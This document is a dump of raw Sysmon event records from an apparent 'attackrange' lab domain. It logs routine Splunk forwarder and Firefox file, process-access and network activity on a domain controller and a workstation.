23542300x80000000000000001052764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=448DD78F7983BC3472FA95C8F4F695D5,SHA256=3C6649170371CEDD5A07289E5933818F399E55BE3D934CCAB94C8D7488F9EB45,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DC1E1D4F77D2FCC9C721027EBFD13C0A,SHA256=B2231DD490DBF09DD69A02932A9E53F5F8C5494C69B627D3AB5273ED05D02A40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BE63F6B561151369A68AAE6B76D67044,SHA256=BE8E81DE43DC4FBCD45122F1E0E9EDA9E60114B9F54593F1DF35300D82B172A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.906{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=14C969283FAFDC8E6556A1443C9143CB,SHA256=DBF5DF97336238E07B575A18915F6E553ABC7B74511DEC4CF1F28D678AC5D73C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:49.568{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93BB0368390092D977A897F2E82330D0,SHA256=247F410D153118EEB10229E57F1DFD872BD6858495603833092D4C2C2850DE06,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:48.274{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57400-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809486Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:49.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126BBE9E0B150482C1FC9D481F5B8CDD,SHA256=7759DB5E3D28E78A5FF58D72187EBBF3CBF89401FF1E5018231A5DD71FD4CB40,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.942{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052782Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.923{466BC892-F72A-60EB-BC7D-00000000CF01}2840C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001052781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.636{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1320FBFE6450B3C0E8A75CD52BD733AD,SHA256=5DD6684265038E960ED363D7442C5FE0EC1390244FE86B899A724D7757C16C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:50.923{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F009743A8F170A2E1BA177C97F4D0D9D,SHA256=009BC9BEB2F4E2EDB73132A1160AB06F88EDD7D9608B341843B7123F0095ADE6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:50.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E4AFF5314E38B441528D5040F206303,SHA256=784AB05D0179A67589022E42491D472C80E3A422EC8C592B761A834402BBE5FE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.552{466BC892-F72A-60EB-BB7D-00000000CF01}75766852C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.305{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.289{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:50.284{466BC892-F72A-60EB-BB7D-00000000CF01}7576C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001052801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.831{466BC892-F72B-60EB-BD7D-00000000CF01}38529720C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.663{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD12EA984FA55C9C1D82F6AF7A337FE,SHA256=E7150F92589B6459151ED34A91130C0674188A8B9A8CBF0A49B7079805DF2317,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809491Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:49.803{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-9237-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809490Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:51.470{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CAA536FBE31282E61280CEE4CCC17831,SHA256=3CBF563C0550FF918BC2D5C9910D353392BC48A398BB25528028DC5AE5BD1A69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.578{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F72B-60EB-BD7D-00000000CF01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.578{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:51.578{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 